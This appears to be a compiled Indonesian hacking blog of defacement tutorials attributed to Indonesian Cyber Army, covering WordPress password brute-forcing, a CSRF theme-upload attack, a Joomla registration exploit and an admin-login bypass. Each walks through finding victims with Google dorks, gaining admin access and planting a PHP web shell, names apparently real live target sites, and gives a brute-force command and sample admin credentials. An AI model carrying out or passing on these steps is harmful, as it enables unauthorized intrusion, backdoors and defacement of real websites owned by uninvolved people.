Sebenarnya sulit untuk mengatakan tingkatan akhir atau final dari hacker telah tercapai, karena selalu saja ada sesuatu yang baru untuk dipelajari atau ditemukan (mengumpulkan informasi dan mempelajarinya dengan cermat merupakan dasar-dasar yang sama bagi seorang hacker) dan hal tersebut juga tergantung perasaan (feeling). Meskipun demikian, menjadi seorang hacker memang lebih menjurus pada hal pemikiran.


Semoga bermanfaat

Total comment

Author

Adnan
UPDATE: Link sudah diperbaiki... :)

Salam Sobat,, ;)


Hajiahh,, dini hari kagak ngapa2in neh, ga bisa tidur :3 tapi ga apa apa dah, setidaknya bisa membuat Tutorial yang berguna buat sobat semua ^_^ langsung dah disimak yooo.. ;)

Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Pertama Download Bahan-Bahannya:

WPBruteforce


Password: http://indocyberarmy.blogspot.com

Dork: inurl:/wp-login.php

Yup, saatnya kita beraksi.. :)

Live Target: http://live-target.pusku.com/

Pertama, Extract File yg didownload tadi di Directori C: sehingga posisi menajdi C:\WPBrute



Lalu buka comand dengan cara : Klik Start>Run>ketik cmd


Biasanya posisi default directories di Cmd : C:\User\User_Name>
Ubah posisi directori dgn cara: ketik cd.. trus enter!

ex:
C:\User\User_Name>cd..
C:\User>cd..
C:\>
 Lalu  setelah itu masukkan perintah C:\>cd WPBrute lalu tekan enter! 



Buka file dengan mengetik perintah: WPBorce.exe maka Akan muncul tampilan seperti gambar!


Lalu masukkan perintah: WPBforce.exe -url=http://www.tvbba.nl -user=admin -pass=wordlist.txt -threads=10



Lalu tekan enter!

Tunggu proses hingga selesai!



Wew! Berhasil tuh! wkwkwk Mantap! :p

Langsung Login dah!




GoodLuck!! :D

Content Created By Onix AQua
Sumber : Indonesian Cyber Army

Total comment

Author

Adnan
Assalamualaikum :)
Pada kesempatan kali ini aku mau kasih tutorial deface dengan tekhnik CSRF, oke tanpa basa basi kita mulai yah :D

Bahan-Bahan:

1. Download Script CSRF
===============================================================
DOWNLOAD DISINI  Password: Lihat
===============================================================
Note: Aktifkan Java Script untuk download!!

2. Download MadspotShell Disini Extract dulu dari file Rar!

3. Cari target dengan DORK :

  • inurl:/wp-content/themes/shepard
  • inurl:/wp-content/themes/money
  • inurl:/wp-content/themes/clockstone
  • inurl:/wp-content/themes/ambleside
  • inurl:/wp-content/themes/pacifico
#Dork dikembangkan sendiri ya :)

4. Untuk coba2 gunakan Live Target & Live Target 2

5. Great Thanks To om Edo aka Mr. Goodday aka 007 Yg udh ngajarin :D

6. Titip Nama :: Indonesian Cyber Army ( IDCA ) | Stealth Defacer Hacking Team (SDHT)
#Persiapan sudah selesai, sekarang tinggal kita eksekusi :)

7. Download Video Tutorial | Pass : onixidca


Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Langkah- Langkah:

1. Masukan Dork ke dalam google (kurang jelas lihat gambar)

2. Pilih salah satu target yang kita dapat tadi (Kurang jelas lihat gambar)
Contoh :
http://www.robertcarpentry.com/wp-content/themes/pacifico/images/ ganti menjadi http://www.robertcarpentry.com/wp-content/themes/pacifico/theme

3. Klik folder "Function" lalu klik file "Upload-bg.php" / "uploadbg.php" / "upload.php"
Note: Jika muncul "You Must Login....."atau blank? cari target lain!! :p  "Jika muncul "error" berarti Web target Vulnerable" ;p
4. Buka file CSRF.html yang tadi sudah di download dengan notepad, ganti URLTARGET  dengan link yang berada di addres bar target kamu tadi. Lihat Gambar! lalu save!
Contoh: "http://www.robertcarpentry.com/wp-content/themes/pacifico/theme/functions/upload-bg.php"
5. Buka file CSRF.html, akan muncul upload file. lalu Pilih Madspotshell.php lalu klik upload .
Jika berhasil maka akan muncul seperti ini (lihat gambar)
6. Udah diganti ? dan jika berhasil maka tampilannya akan jadi seperti ini
#itu tandanya shell backdoor kamu sudah terpasang :D sekarang terserah mau kamu apain website itu :)

#Saya menggunakan SHELL dari teman saya om X Inject :D (tampilan shell akan berbeda beda loh setiap jenisnya)
Tampilan madspotshell::
7. Untuk eksekusi Index, silahkan lihat Cara Tebas Index Website Wordpress

Sekian tutor yang dapat saya berikan :)

kalo kurang jelas, boleh tanya kan pada "Garuda Dot Id"
Sumber : Indonesian Cyber Army Sekian :)

Total comment

Author

Adnan
Assalamualaikum....

ehm,, jumpa lagi nih dengan coretan2 semerawut ane tapi ngangenin untuk dibaca,, wkkwkwk yo dah, dah pasti pada ga sabar kan udah nunggu dari kemaren?? wkwkwk langsung daaahh :p

Silahkan tutorial ini di baca dulu baik2, dipahami dan dipelajari, baru dah sobat praktekin :p kalo seandainya gagal, itu karena website udah di patch :p

"Talk Less Do More!" :p

oke dah simak nih! sebelumnya download dulu bahan2nya :p

1. Download : Exploit Joomla.html    Password: Lihat

2. Titip Nama : Indonesian Cyber Army

Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Langkah Langkah::

1. Cari web target di Google.com dengan memasukkan Dork berikut:

intext:Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com

#Dork Kembangin Sendiri :p

2. Pilih target sobat, lalu masukin exploit berikut:

index.php?option=com_users&view=registration

3. Ane disini mengambil contoh:

http://mobile.resto-lincontournable.com/index.php/utiliser-joomla/utiliser-extensions/composants/composant-flux-rss/un-flux-rss

4. kemudian ane ganti menjadi:

http://mobile.resto-lincontournable.com/index.php?option=com_users&view=registration



5. Setelah itu klik kanan>klik View Page Source atau bisa juga tekan tombol keyboard CTRL+U

kalo sudah muncul page sourcenya, lalu tekan tombol CTRL+F atau klik menu Find ketik hidden. cari seperti kode berikut:

6. Copy kode tersebut, lalu buka Exploit Joomla.html yang udah sobat download tadi dengan Notepad, lalu pastekan kode tersebut, dan masukkan juga site target dan Email sobat! liat gambar !
7. Lalu Save! Setelah itu buka file Exploit Joomla.html nya, Klik Register!
8. Setelah itu akan muncul peringatan bahwa password harus diisi sama! Masukkan password sobat!


9. Setelah password diisi, klik Register! lalu buka email sobat dan klik link Konfirmasinya!







10. Lalu masuk kehalaman admin login nya! 
http://mobile.resto-lincontournable.com/administrator
11. Masukkan Username & Passwordnya! lalu klik Login! kalo contoh disini:

Username:genesis
Password:onix
Tararaaaaaaaaaaaaaa!! Sobat masuk sebagai admin! trus tebas deh index nya :p Liat Cara Tebas Index
Goodluck!!! :p

udah gitu aja! Salam........ :p
Content Created By Onix AQua
Sumber : Indonesian Cyber Army

Total comment

Author

Adnan
UPDATE: Teknik ini  hanya bisa dilakukan pada CMS Premium, kalo sobat menemukan web yg tidak bisa  diedit/error, berarti CMS web tersebut bukan Premium atau bisa jadi sudah dipatch/diperbaiki.. 

Assalamualaikum....

Salam kompak sobat2 IDCA, ^_^

Tidak ada bosan2 nya ane mau share tentang depes2an,, soalnya lagi marak dan bnyak banget yg menyukai aktivitas ini, yah walaupun beresiko masuk BUI,, wkwkwk :p

Langsung aja lah, males ngetik banyak2! :p


Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

kali ini ane mau share tentang teknik Bypass Halaman Login Administrator! Bagaimana caranya? Yuk simak aja rame rame,, hehhehe ;)

Bahan Bahan :

Dork: inurl:/index_info.php     Lihat Dork yg lain Disini

Live Target : http://niche-marketplace.net/index_info.php  

Note: "Saat ini sudah sulit mencari web target yang bisa ditanemin shell, kebanyakn udah di patch, hanya orang2 yang mau berusaha yg bisa mnemukan web target" :p

Langkah Langkahnya:

Cari Target Google.com dengan menggunakan Dork, disini ane dapet target http://niche-marketplace.net/index_info.php



Lalu masuk ke halaman login admin! biasanya letaknya site.com/admin/index.php atau bisa jadi site.com/[path]/admin/index.php kalo target ane : http://niche-marketplace.net/admin/index.php 


Setelah itu kita lakukan Inspect Elemen! dengan cara klik kanan, lalu pilih Inspect Element!



 Lalu akan muncul seperti gambar dibawah! yang perlu kita lakukan adalah mencari Source code berikut :


 Ganti "hidden" dengan "text" lalu akan muncul kotak label "admin_settings_read" ganti read menjadi write! lihat gambar!


Lalu tekan Enter!


Klik Login aja!

Note: "Kalo ada muncul pesan seperti digambar, berarti target vuln ato bisa di depes! Selain itu ga bisa, cari target lain! :p



Duaaarrrrrrrrr!! Udah masuk? Mantap! Trus mo ngapain lagi?? udah gitu aja! wkwkwkwk :p


Trus Tanemshell nya gimana gan?? Hajiahhh,, :3 makanya baca tutorial ampe abis dulu, dipahami dan dipelajari baru dipraktekin.. hadeewwhhh!!

Oke, sekarang kita udah masuk ke halaman admin, saatnya kita tanem Shell! Apa itu Shell?? Baca lagi sono di postingan ane Apa itu WebShell :p Disini ane make Madspotshell!

WAJIB!!! Harap diperhatikan dan dicermati baik baik, jika ada sedikit kesalahan maka Shell sobat yg ditanem akan Gagal dieksekusi! dan akhirnya balik maning ke awal :p

Note: Langkah selanjutnya  hanya bisa dilakukan pada CMS Premium, kalo sobat menemukan web yg tidak bisa  diedit/error, berarti CMS web tersebut bukan Premium atau bisa jadi sudah dipatch/diperbaiki.. 

Pertama gulirkan kebawah! cari menu "Add/Remove Navigation Page"



Klik Add/Remove Navigation Page! Lalu ketik nama shell.php sobat, kalo ane mah "idca.php". Untuk lebih jelasnya liat gambar!


 Lalu klik "Add New Navigation"


Setelah itu masih dihalaman yg sama, liat kebawah sampai menemukan kalimat: "Sort Page Buttons/links" trus ubah "idca.php.html" jadi "/idca.php". liat gambar!



Lalu klik "Sort Navigation Pages"!

Selanjutnya cari Menu "Edit Navigation Pages" lalu klik menu tersebut. Kemudian pada kolom "Please Select a Pages To Edit" lalu pilih "idca.php.html". disini kita akan melakukan Inspect Element lagi, lalu cari kata "idca.php.html" dan ubah jadi "idca.php".  Lihat gambar!


Kemudian masih dihalaman yg sama, gulirkan kebawah!

Pada kolom "Enter A Page Title As You Would Like To Be Seen" ketik "idca.php"

Pada kolom "URL For This Site" ketik "main_pages/idca.php"

Pada kota box, ceklis/centang ketiganya. untuk lebih jelas, lihat gambar!



Selanjutnya masih juga di halaman yg sama, gulirkan kebawah! Pada kolom "Enter Content for Your Pages" pilih "Source" lalu editor akan aktif!

Buka shell Backdoor (madspotshell.php) dengan notepad untuk dipaste kan ke Konten Pages!



WAJIB DIPERHATIKAN, karena menentukan keberhasilan!

Sebaiknya Shell Backdoor jangan diberi password!


Jadi nanti seperti ini cara nulisnya.

<Line kosong>
<Line kosong>
{ Isi Kodingan PHP Shell dari awal sampai akhir }
<Line kosong>
<Line kosong>

Yap di Line awal diisikan ruang kosong 2x (alias teken enter 3x) dan di Line akhir diisikan ruang kosong 2x (alias teken enter 3x). Kurang jelas? lihat gambar :


 lalu


Lalu klik Save! akan muncul pesan seperti gambar berikut!


Selanjutnya saatnya kita buka shell backdoor yg udah kita tanem! caranya tulis diadress bar: http://site.com/main_pages/Nama File Backdoor.php Liat gambar!



Huft! Akhirnya Selesai dan Berhasil tuh! Tinggal tebas index aja! wkwkwk

Untuk yg belum mengerti cara tebas index web, silahkan Baca Cara Tebas Index Web

Content Creator By Onix AQua

Total comment

Author

Adnan